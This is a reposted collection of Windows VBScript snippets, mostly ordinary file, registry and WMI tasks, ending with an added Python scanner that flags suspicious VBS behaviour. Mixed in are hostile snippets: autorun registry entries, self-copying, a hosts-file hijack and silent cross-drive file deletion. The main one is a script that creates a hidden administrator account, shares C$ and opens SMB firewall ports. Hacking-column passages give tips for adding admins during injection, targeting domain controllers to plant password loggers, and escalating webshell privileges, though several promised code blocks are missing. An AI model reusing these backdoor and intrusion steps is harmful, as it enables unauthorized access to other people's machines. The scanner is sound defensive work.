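A Collection of Commonly Used Classic VBS Script Code
While looking up material online I came across a lot of classic VBS code, so I collected it here for future study.
VBS scripts have many uses:
1. Calculation
2. Working with files and folders
3. Managing Windows
4. Working with Office documents such as Word, Excel and PowerPoint
5. Embedding in web pages and driving DHTML
6. Writing HTTP communication
7. Calling system functions (COM components), for example text-to-speech
8. Parsing HTML and XML
9. Invoking the command line and parsing the returned results
10. Processing images
11. Automating keystrokes
12. Calling and managing Windows Media Player
13. Calling and managing Windows Live Messenger
14. Server-side technology: Active Server Pages (ASP)
15. Script viruses
16. Working with databases
Below is the VBS code I have collected; most of it is reposted from gangzi.org, and I will keep updating it.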
VBS: get the system installation path
First define a variable that holds the system installation path, then use "&strWinDir&" to reference that variable.
    Set WshShell = WScript.CreateObject("WScript.Shell")
    strWinDir = WshShell.ExpandEnvironmentStrings("%WinDir%")

VBS: get the C:\Program Files path
    MsgBox CreateObject("WScript.Shell").ExpandEnvironmentStrings("%ProgramFiles%")

VBS: get the C:\Program Files\Common Files path
    MsgBox CreateObject("WScript.Shell").ExpandEnvironmentStrings("%CommonProgramFiles%")

Add a URL shortcut to the desktop
    Set gangzi = WScript.CreateObject("WScript.Shell")
    strDesktop = gangzi.SpecialFolders("Desktop")
    Set oShellLink = gangzi.CreateShortcut(strDesktop & "\Internet Explorer.lnk")
    oShellLink.TargetPath = "http://www.fendou.info"
    oShellLink.Description = "Internet Explorer"
    oShellLink.IconLocation = "%ProgramFiles%\Internet Explorer\iexplore.exe, 0"
    oShellLink.Save

Add a URL to Favorites
    ' 6 is the Shell special-folder ID for Favorites; the constant's name is misleading
    Const ADMINISTRATIVE_TOOLS = 6
    Set objShell = CreateObject("Shell.Application")
    Set objFolder = objShell.Namespace(ADMINISTRATIVE_TOOLS)
    Set objFolderItem = objFolder.Self
    Set objShell = WScript.CreateObject("WScript.Shell")
    strDesktopFld = objFolderItem.Path
    Set objURLShortcut = objShell.CreateShortcut(strDesktopFld & "\奮斗Blog.url")
    objURLShortcut.TargetPath = "http://www.fendou.info/"
    objURLShortcut.Save

Delete files with a given extension in a given directory
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.DeleteFile "C:\*.vbs", True
    Set fso = Nothing

VBS: change the home page
    Set oShell = CreateObject("WScript.Shell")
    oShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.fendou.info"

VBS: add a startup entry
    Set oShell=CreateObject("Wscript.Shell")
    oShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\cmd","cmd.exe"

VBS: copy itself
    set copy1=createobject("scripting.filesystemobject")
    copy1.getfile(wscript.scriptfullname).copy("c:\huan.vbs")
The snippet above copies the script itself to huan.vbs on drive C. The following one copies game.exe from the script's directory to gangzi.exe on drive C:
    set copy1=createobject("scripting.filesystemobject")
    copy1.getfile("game.exe").copy("c:\gangzi.exe")

VBS: get the system temporary directory
    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim tempfolder
    Const TemporaryFolder = 2
    Set tempfolder = fso.GetSpecialFolder(TemporaryFolder)
    Wscript.Echo tempfolder

Keep executing even if the code raises an error
    On Error Resume Next

VBS: open a URL
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run("http://www.fendou.info/")

VBS: send e-mail
    NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
    Set Email = CreateObject("CDO.Message")
    Email.From = "發件@qq.com"    ' placeholder: sender address
    Email.To = "收件@qq.com"      ' placeholder: recipient address
    Email.Subject = "Test sendmail.vbs"
    Email.Textbody = "OK!"
    Email.AddAttachment "C:\1.txt"
    With Email.Configuration.Fields
        .Item(NameSpace&"sendusing") = 2
        .Item(NameSpace&"smtpserver") = "smtp.郵件服務器.com"    ' placeholder: SMTP server
        .Item(NameSpace&"smtpserverport") = 25
        .Item(NameSpace&"smtpauthenticate") = 1
        .Item(NameSpace&"sendusername") = "發件人用戶名"    ' placeholder: sender user name
        .Item(NameSpace&"sendpassword") = "發件人密碼"      ' placeholder: sender password
        .Update
    End With
    Email.Send

VBS: terminate a process
    strComputer = "."
    Set objWMIService = GetObject _
        ("winmgmts:\\" & strComputer & "\root\cimv2")
    Set colProcessList = objWMIService.ExecQuery _
        ("Select * from Win32_Process Where Name = 'Rar.exe'")
    For Each objProcess in colProcessList
        objProcess.Terminate()
    Next

VBS: open a URL hidden (some browsers cannot be opened hidden and open visibly instead; suitable for mainstream users)
    createObject("wscript.shell").run "iexplore http://www.fendou.info/",0
Compatible with all browsers: open using IE's absolute path plus an argument. I could not obtain the IE installation path with a function, only the Program Files path. This should be better than the method above, but neither method is guaranteed to work.
    Set objws=WScript.CreateObject("wscript.shell")
    objws.Run """C:\Program Files\Internet Explorer\iexplore.exe"" www.baidu.com",0    ' 0 = hidden window

VBS: traverse the disks and delete files with a given name
    On Error Resume Next
    Dim fPath
    strComputer = "."
    Set objWMIService = GetObject _
        ("winmgmts:\\" & strComputer & "\root\cimv2")
    Set colProcessList = objWMIService.ExecQuery _
        ("Select * from Win32_Process Where Name = 'gangzi.exe'")
    For Each objProcess in colProcessList
        objProcess.Terminate()
    Next
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colDirs = objWMIService. _
        ExecQuery("Select * from Win32_Directory where name LIKE '%c:%' or name LIKE '%d:%' or name LIKE '%e:%' or name LIKE '%f:%' or name LIKE '%g:%' or name LIKE '%h:%' or name LIKE '%i:%'")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    For Each objDir in colDirs
        fPath = objDir.Name & "\gangzi.exe"
        objFSO.DeleteFile(fPath), True
    Next

VBS: get the network adapter MAC address
    Dim mc,mo
    Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")
    For Each mo In mc
        If mo.IPEnabled=True Then
            ' message text: "The MAC address of this machine's adapter is:"
            MsgBox "本機網卡MAC地址是: " & mo.MacAddress
            Exit For
        End If
    Next

VBS: read the home page address from the local registry
    Set reg=WScript.CreateObject("WScript.Shell")
    startpage=reg.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page")
    MsgBox startpage

VBS: traverse all directories on all disks, find every .txt file, and append a line to the bottom of each txt file
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    Co = VbCrLf & "路過。。。"    ' appended text: "Passing by..."
    For Each i In fso.Drives
        If i.DriveType = 2 Then    ' 2 = fixed disk
            GF fso.GetFolder(i & "\")
        End If
    Next
    Sub GF(fol)
        Wh fol
        Dim i
        For Each i In fol.SubFolders
            GF i
        Next
    End Sub
    Sub Wh(fol)
        Dim i
        For Each i In fol.Files
            ' note: the code as posted matches the extension "shtml", not "txt"
            If LCase(fso.GetExtensionName(i)) = "shtml" Then
                fso.OpenTextFile(i,8,0).Write Co
            End If
        Next
    End Sub

Get all drive letters on the computer
    Set fso=CreateObject("scripting.filesystemobject")
    Set objdrives=fso.Drives ' get all disk drives on this computer
    For Each objdrive In objdrives   ' iterate over the drives
        MsgBox objdrive
    Next

VBS: create a file in the root directory of every local disk
    On Error Resume Next
    Set fso=CreateObject("Scripting.FileSystemObject")
    Set gangzis=fso.Drives ' get all disk drives on this computer
    For Each gangzi In gangzis   ' iterate over the drives
        Set TestFile=fso.CreateTextFile(""&gangzi&"\新建文件夾.vbs",True)
        TestFile.WriteLine("By www.gangzi.org")
        TestFile.Close
    Next

VBS: traverse all local disks, find every 123.exe, and rename them to 321.exe
    set fs = CreateObject("Scripting.FileSystemObject")
    for each drive in fs.drives
        fstraversal drive.rootfolder
    next
    sub fstraversal(byval this)
        for each folder in this.subfolders
            fstraversal folder
        next
        set files = this.files
        for each file in files
            if file.name = "123.exe" then file.name = "321.exe"
        next
    end sub

VBS: write text to the clipboard (a note first: almost every example online writes to the clipboard through the InternetExplorer.Application object, but the drawback is that a browser window pops up when the default browser is not IE, so it took a lot of effort to find this code)
    str="這里是你要復制到剪貼板的字符串"    ' placeholder: the string to copy to the clipboard
    Set ws = wscript.createobject("wscript.shell")
    ws.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0,true

QQ: send a message automatically
    On Error Resume Next
    str="我是笨蛋/qq"
    Set WshShell=WScript.CreateObject("WScript.Shell")
    WshShell.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0
    WshShell.run "tencent://message/?Menu=yes&uin=20016964&Site=&Service=200&sigT=2a39fb276d15586e1114e71f7af38e195148b0369a16a40fdad564ce185f72e8de86db22c67ec3c1",0,true
    WScript.Sleep 3000
    WshShell.SendKeys "^v"
    WshShell.SendKeys "%s"

VBS: hide a file
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.GetFile("F:\軟件大賽\show.txt")
    If objFile.Attributes = objFile.Attributes AND 2 Then
        objFile.Attributes = objFile.Attributes XOR 2
    End If

VBS: generate a random number (521 is the generation rule, i.e. the seed passed to Randomize; different numbers give different rules; this can be used for other purposes)
    Randomize 521
    point=Array(Int(100*Rnd+1),Int(1000*Rnd+1),Int(10000*Rnd+1))
    msgbox join(point,"")

VBS: remove the IE icon from the desktop (the built-in icon, not a shortcut)
    Set oShell = CreateObject("WScript.Shell")
    oShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"

VBS: get the script's own file name
    Set fso = CreateObject("Scripting.FileSystemObject")
    msgbox WScript.ScriptName

VBS: read a Unicode-encoded file
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.OpenTextFile("gangzi.txt",1,False,-1)
    strText = objFile.ReadAll
    objFile.Close
    Wscript.Echo strText

VBS: read a file in a specified encoding (UTF-8 by default); the variable gangzi is the path of the file to read
    set stm2 =createobject("ADODB.Stream")
    stm2.Charset = "utf-8"
    stm2.Open
    stm2.LoadFromFile gangzi
    readfile = stm2.ReadText
    MsgBox readfile

VBS: disable Group Policy
    Set oShell = CreateObject("WScript.Shell")
    oShell.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins",1,"REG_DWORD"

VBS: write a file in a specified encoding (UTF-8 by default); the variable gangzi is the path of the file, and gangzi2 holds the content
    gangzi="1.txt"
    gangzi2="www.gangzi.org"
    Set Stm1 = CreateObject("ADODB.Stream")
    Stm1.Type = 2
    Stm1.Open
    Stm1.Charset = "UTF-8"
    Stm1.Position = Stm1.Size
    Stm1.WriteText gangzi2
    Stm1.SaveToFile gangzi,2
    Stm1.Close
    set Stm1 = nothing

VBS: get the names of all folders in the current directory (excluding subfolders)
    Set fso=CreateObject("scripting.filesystemobject")
    Set f=fso.GetFolder(fso.GetAbsolutePathName("."))
    Set folders=f.SubFolders
    For Each fo In folders
        wsh.echo fo.Name
    Next
    Set folders=Nothing
    Set f=nothing
    Set fso=nothing

VBS: get the names of all folders under a given directory (including subfolders)
    Dim t
    Set fso=WScript.CreateObject("scripting.filesystemobject")
    Set fs=fso.GetFolder("d:\")
    WScript.Echo aa(fs)
    Function aa(n)
        Set f=n.subfolders
        For Each uu In f
            Set op=fso.GetFolder(uu.path)
            t=t & vbcrlf & op.path
            Call aa(op)
        Next
        aa=t
    End function

VBS: create a .URL file (different IconIndex values select different icons; see the icons inside SHELL32.dll for details)
    set fso=createobject("scripting.filesystemobject")
    qidong=qidong&"[InternetShortcut]"&Chr(13)&Chr(10)
    qidong=qidong&"URL=http://www.fendou.info"&Chr(13)&Chr(10)
    qidong=qidong&"IconFile=C:\WINDOWS\system32\SHELL32.dll"&Chr(13)&Chr(10)
    qidong=qidong&"IconIndex=130"&Chr(13)&Chr(10)
    Set TestFile=fso.CreateTextFile("qq.url",True)
    TestFile.WriteLine(qidong)
    TestFile.Close

VBS: write to hosts (no check is made; the entries are appended to the bottom whether or not they already exist)
    Set fs = CreateObject("Scripting.FileSystemObject")
    path = ""&fs.GetSpecialFolder(1)&"\drivers\etc\hosts"
    Set f = fs.OpenTextFile(path,8,TristateFalse)
    f.Write ""&vbcrlf&"127.0.0.1 www.g.cn"&vbcrlf&"127.0.0.1 g.cn"
    f.Close

VBS: read the names of all keys under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace and output them in a loop
    Const HKLM = &H80000002
    strPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace"
    Set oreg = GetObject("Winmgmts:\root\default:StdRegProv")
    oreg.EnumKey HKLM,strPath,arr
    For Each x In arr
        WScript.Echo x
    Next

VBS: create a txt file
    Dim fso,TestFile
    Set fso=CreateObject("Scripting.FileSystemObject")
    Set TestFile=fso.CreateTextFile("C:\hello.txt",True)
    TestFile.WriteLine("Hello,World!")
    TestFile.Close

VBS: create a folder
    Dim fso,fld
    Set fso=CreateObject("Scripting.FileSystemObject")
    Set fld=fso.CreateFolder("C:\newFolder")

VBS: check whether a folder exists
    Dim fso,fld
    Set fso=CreateObject("Scripting.FileSystemObject")
    If (fso.FolderExists("C:\newFolder")) Then
        msgbox("Folder exists.")
    else
        set fld=fso.CreateFolder("C:\newFolder")
    End If

VBS: check a folder using variables
    Dim fso,fld
    drvName="C:\"
    fldName="newFolder"
    Set fso=CreateObject("Scripting.FileSystemObject")
    If (fso.FolderExists(drvName&fldName)) Then
        msgbox("Folder exists.")
    else
        set fld=fso.CreateFolder(drvName&fldName)
    End If

VBS: add input boxes
    Dim fso,TestFile,fileName,drvName,fldName
    drvName=inputbox("Enter the drive to save to:","Drive letter")
    fldName=inputbox("Enter the folder name:","Folder name")
    fileName=inputbox("Enter the name of the file:","Filename")
    Set fso=CreateObject("Scripting.FileSystemObject")
    If(fso.FolderExists(drvName&fldName))Then
        msgbox("Folder exists")
    Else
        Set fld=fso.CreateFolder(drvName&fldName)
    End If
    Set TestFile=fso.CreateTextFile(drvName&fldName&"\"&fileName&".txt",True)
    TestFile.WriteLine("Hello,World!")
    TestFile.Close

VBS: check whether a file with the same name exists
    Dim fso,TestFile,fileName,drvName,fldName
    drvName=inputbox("Enter the drive to save to:","Drive letter")
    fldName=inputbox("Enter the folder name:","Folder name")
    fileName=inputbox("Enter the name of the file:","Filename")
    Set fso=CreateObject("Scripting.FileSystemObject")
    If(fso.FolderExists(drvName&fldName))Then
        msgbox("Folder exists")
    Else
        Set fld=fso.CreateFolder(drvName&fldName)
    End If
    If(fso.FileExists(drvName&fldName&"\"&fileName&".txt"))Then
        msgbox("File already exists.")
    Else
        Set TestFile=fso.CreateTextFile(drvName&fldName&"\"&fileName&".txt",True)
        TestFile.WriteLine("Hello,World!")
        TestFile.Close
    End If

VBS: overwrite or append to a file
    Dim fso,openFile
    Set fso=CreateObject("Scripting.FileSystemObject")
    Set openFile=fso.OpenTextFile("C:\test.txt",2,True)   ' 1 = read-only, 2 = write, 8 = append
    openFile.Write "Hello World!"
    openFile.Close

VBS: read a file, ReadAll reads everything
    Dim fso,openFile
    Set fso=CreateObject("Scripting.FileSystemObject")
    Set openFile=fso.OpenTextFile("C:\test.txt",1,True)
    MsgBox(openFile.ReadAll)

VBS: read a file, ReadLine reads one line
    Dim fso,openFile
    Set fso=CreateObject("Scripting.FileSystemObject")
    Set openFile=fso.OpenTextFile("C:\test.txt",1,True)
    MsgBox(openFile.ReadLine())
    MsgBox(openFile.ReadLine())   ' raises an error if you read more lines than the file contains

VBS: read a file, Read reads n characters
    Dim fso,openFile
    Set fso=CreateObject("Scripting.FileSystemObject")
    Set openFile=fso.OpenTextFile("C:\test.txt",1,True)
    MsgBox(openFile.Read(2))   ' no error if n exceeds the number of characters

VBS: delete a file
    Dim fso
    Set fso=CreateObject("Scripting.FileSystemObject")
    fso.DeleteFile("C:\test.txt")

VBS: delete a folder
    Dim fso
    Set fso=CreateObject("Scripting.FileSystemObject")
    fso.DeleteFolder("C:\newFolder") ' deletes the folder whether or not it contains files

VBS: create files in a loop
    Dim fso,TestFile
    Set fso=CreateObject("Scripting.FileSystemObject")
    For i=1 To 10
        Set TestFile=fso.CreateTextFile("C:\hello"&i&".txt",True)
        TestFile.WriteLine("Hello,World!")
        TestFile.Close
    Next

VBS: generate a random string from the computer name
    set ws=createobject("wscript.shell")
    set wenv=ws.environment("process")
    RDA=wenv("computername")
    Function UCharRand(n)
        For i=1 to n
            Randomize ASC(MID(RDA,1,1))
            temp = cint(25*Rnd)
            temp = temp +65
            UCharRand = UCharRand & chr(temp)
        Next
    End Function
    msgbox UCharRand(LEN(RDA))

VBS: generate a serial number from the MAC address
    Function Encode(strPass)
        Dim i, theStr, strTmp
        For i = 1 To Len(strPass)
            strTmp = Asc(Mid(strPass, i, 1))
            theStr = theStr & Abs(strTmp)
        Next
        strPass = theStr
        theStr = ""
        Do While Len(strPass) > 16
            strPass = JoinCutStr(strPass)
        Loop
        For i = 1 To Len(strPass)
            strTmp = CInt(Mid(strPass, i, 1))
            strTmp = IIf(strTmp > 6, Chr(strTmp + 60), strTmp)
            theStr = theStr & strTmp
        Next
        Encode = theStr
    End Function
    Function JoinCutStr(str)
        Dim i, theStr
        For i = 1 To Len(str)
            If Len(str) - i = 0 Then Exit For
            theStr = theStr & Chr(CInt((Asc(Mid(str, i, 1)) + Asc(Mid(str, i +1, 1))) / 2))
            i = i + 1
        Next
        JoinCutStr = theStr
    End Function
    Function IIf(var, val1, val2)
        If var = True Then
            IIf = val1
        Else
            IIf = val2
        End If
    End Function
    Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")
    For Each mo In mc
        If mo.IPEnabled=True Then
            theStr = mo.MacAddress
            Exit For
        End If
    Next
    Randomize Encode(theStr)
    rdnum=Int(10*Rnd+5)
    Function allRand(n)
        For i=1 to n
            Randomize Encode(theStr)
            temp = cint(25*Rnd)
            If temp mod 2 = 0 then
                temp = temp + 97
            ElseIf temp < 9 then
                temp = temp + 48
            Else
                temp = temp + 65
            End If
            allRand = allRand & chr(temp)
        Next
    End Function
    msgbox allRand(rdnum)

VBS: connect ADSL automatically
    Dim Wsh
    Set Wsh = WScript.CreateObject("WScript.Shell")
    ' placeholders: connection name, account, password
    wsh.run "Rasdial 連接名字 賬號 密碼",false,1

VBS: disconnect ADSL automatically
    Dim Wsh
    Set Wsh = WScript.CreateObject("WScript.Shell")
    wsh.run "Rasdial /DISCONNECT",false,1

VBS example: change IP automatically every 3 seconds and open a URL (worth noting: in the code below every URL is opened in the same IE window, so each navigation replaces the previous one; if you need every URL to open in a new window, just use Run)
    Dim Wsh
    Set Wsh = WScript.CreateObject("WScript.Shell")
    Set oIE = CreateObject("InternetExplorer.Application")
    for i=1 to 5
        wsh.run "Rasdial /DISCONNECT",false,1
        ' placeholders: connection name, account, password
        wsh.run "Rasdial 連接名字 賬號 密碼",false,1
        oIE.Navigate "http://www.ip138.com/?"&i&""
        Call SynchronizeIE
        oIE.Visible = True
    next
    Sub SynchronizeIE
        On Error Resume Next
        Do While(oIE.Busy)
            WScript.Sleep 3000
        Loop
    End Sub

Adding an administrator account with VBS
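During an injection you may clearly have the sa account, yet because net.exe and net1.exe are restricted, or for some other unknown reason, you can never add an administrator account. The Active Directory (ADSI) part of VBS has a WinNT object that can be used to manage local resources, and it can add an administrator without relying on cmd or similar commands. The detailed code is as follows:
If this code is saved as 1.vbs and run from cmd in the form cscript 1.vbs, it adds an administrator named lcx with the password 123456 to the current system. Of course, you can edit the variables lcx and 123456 in Notepad and change them to a name and password you prefer.

Listing the physical directories of virtual hosts with VBS
Sometimes, after compromising a site through a neighbouring site on the same server and obtaining system privileges, you face hundreds of virtual hosts. How do you quickly find the physical directory of the target site? Looking through the sites one by one is too tiring, and the built-in adsutil.vbs seems to have so many parameters that it is hard to know where to start. Try this script of mine; the code is as follows:
After running cscript 2.vbs, it lists in detail the site ID, description and physical directory of each site in IIS. Isn't that much less code and more convenient?

Quickly finding the primary server of an internal domain with VBS
Faced with a domain-structured internal network, many beginners may have no experience of how to penetrate it. If you can obtain the primary domain administrator's password, you can move freely through the whole internal network. The primary domain administrator usually works on the more important machines; if you can take over one or several of them and plant something like a password logger, you will get the password sooner or later. The primary domain server is of course the most important of these machines. How do you tell which one it is among thousands of machines? A DOS command such as net group "domain admins" /domain can serve as one criterion, but VBS can do it too. This still belongs to the ADSI part; the code is as follows:
These two lines of code are enough; run cscript 3.vbs and you will get a result. Of course, whether you use the DOS command or VBS, you must be running with domain-user privileges. For example, if you have obtained a domain user's account and password, you can use the form psexec.exe -u -p cmd.exe to get a shell as that domain user; or, if your trojan already interacts with the desktop and the user logged in to your trojan's shell is a domain user, you can run these commands directly.
The role of VBS in intrusions is of course not limited to these, and JS or other tools can also implement what the code above does; but the topic set for this column is clever uses of VBS in hacking, so we only cover VBS. After finishing this VBS part, the other authors and I will plan further topics for later columns and try to bring readers good, useful articles.

VBS code for WebShell privilege escalation
ASP trojans have always been one of the favourite tools of people who work with scripts, but their privileges are usually fairly low (generally those of IWAM_NAME), so people have come up with various ways to raise them, for example obtaining MSSQL database privileges through the ASP trojan, getting FTP password information, or replacing a service program. The technique I introduce today uses a VBS file to raise the ASP trojan's privileges; the code is as follows:
Save it with a .vbs extension and upload it to the server,
then execute this VBS file through the ASP trojan. Try your ASP trojan again and you will find that you now have SYSTEM privileges.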

VBS: enable the IPC service and related settings
    Dim OperationRegistry
    Set OperationRegistry=WScript.CreateObject("WScript.Shell")
    OperationRegistry.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest",0
    Set wsh3=wscript.createobject("wscript.shell")
    wsh3.Run "net user helpassistant 123456",0,false
    wsh3.Run "net user helpassistant /active",0,false
    wsh3.Run "net localgroup administrators helpassistant /add",0,false
    wsh3.Run "net start Lanmanworkstation /y",0,false
    wsh3.Run "net start Lanmanserver /y",0,false
    wsh3.Run "net start ipc$",0,True
    wsh3.Run "net share c$=c:\",0,false
    wsh3.Run "netsh firewall set notifications disable",0,True
    wsh3.Run "netsh firewall set portopening TCP 139 enable",0,false
    wsh3.Run "netsh firewall set portopening UDP 139 enable",0,false
    wsh3.Run "netsh firewall set portopening TCP 445 enable",0,false
    wsh3.Run "netsh firewall set portopening UDP 445 enable",0,false

VBS: time-of-day check
    Digital=time
    hours=Hour(Digital)
    minutes=Minute(Digital)
    seconds=Second(Digital)
    if (hours<6) then
        dn="凌辰了,還沒睡啊?"    ' "It's the small hours, still not asleep?"
    end if
    if (hours>=6) then
        dn="早上好!"    ' "Good morning!"
    end if
    if (hours>12) then
        dn="下午好!"    ' "Good afternoon!"
    end if
    if (hours>18) then
        dn="晚上好!"    ' "Good evening!"
    end if
    if (hours>22) then
        dn="不早了,夜深了,該睡覺了!"    ' "It's late, time to go to bed!"
    end if
    if (minutes<=9) then
        minutes="0" & minutes
    end if
    if (seconds<=9) then
        seconds="0" & seconds
    end if
    ctime=hours & ":" & minutes & ":" & seconds & " " & dn
    Msgbox ctime

VBS: read and write the registry
    Dim OperationRegistry , mynum
    Set OperationRegistry=WScript.CreateObject("WScript.Shell")
    mynum = 9
    mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest")
    MsgBox("before forceguest = "&mynum)
    OperationRegistry.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest",0
    mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest")
    MsgBox("after forceguest = "&mynum)

VBS: code that deletes itself after running
This article is reposted from the bilinyee blog; original link: http://blog.51cto.com/ericfu/1760378 . Please contact the original author yourself if you wish to repost.
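
Several snippets collected above (Run-key writes, the forceguest change, net user / netsh calls, mshta vbscript:, SendKeys) are the behaviours a defender looks for when triaging a .vbs file found on a host. The Python scanner below is an added example, not code from the original post; its rule names, regular expressions and the SAMPLE script are assumptions constructed here from lines shown on this page.

```python
import re

# Rule names/patterns are this example's assumptions, one per behaviour seen on this page.
RULES = [(name, re.compile(rx, re.I)) for name, rx in [
    ("autorun-regwrite",     r'RegWrite\s+"[^"]*\\CurrentVersion\\Run\\'),
    ("lsa-forceguest-write", r'RegWrite\s+"[^"]*\\Lsa\\forceguest"'),
    ("hosts-file-path",      r'\\drivers\\etc\\hosts'),
    ("account-change",       r'\bnet1?\s+(user|localgroup)\b'),
    ("share-change",         r'\bnet\s+share\b'),
    ("firewall-change",      r'\bnetsh\s+firewall\b'),
    ("mshta-inline-script",  r'\bmshta\s+vbscript:'),
    ("sendkeys",             r'\.SendKeys\b'),
    ("self-copy",            r'ScriptFullName\s*\)\s*\.Copy'),
    ("process-terminate",    r'\.Terminate\s*\('),
    ("errors-suppressed",    r'^\s*On\s+Error\s+Resume\s+Next\b'),
]]

def strip_comment(line):
    """Cut a VBScript ' comment, ignoring apostrophes inside "..." strings."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string  # a doubled "" toggles twice, net no change
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def logical_lines(text):
    """Yield (first_line_no, code) with ' _' line continuations joined."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        code = strip_comment(raw).rstrip()
        start = no if start is None else start
        if code.endswith(" _"):
            buf += code[:-1]
            continue
        yield start, buf + code
        buf, start = "", None
    if buf:
        yield start, buf

def scan(text):
    """Return (line_no, rule_name) findings for one script, in line order."""
    return [(no, name) for no, code in logical_lines(text)
            for name, rx in RULES if rx.search(code)]

# Constructed sample script, assembled from lines shown on this page.
SAMPLE = r'''On Error Resume Next
Set oShell = CreateObject("WScript.Shell")
' oShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\old","x"
oShell.RegWrite _
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\cmd","cmd.exe"
oShell.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest",0
oShell.Run "netsh firewall set portopening TCP 445 enable",0,False
Set col = GetObject("winmgmts:").ExecQuery("Select * from Win32_Process Where Name = 'Rar.exe'")
'''

if __name__ == "__main__":
    for no, name in scan(SAMPLE):
        print(f"line {no}: {name}")
```

The commented-out RegWrite on line 3 is ignored, the continued RegWrite is reported at the line where it starts, and the apostrophes inside the WQL string are not mistaken for a comment.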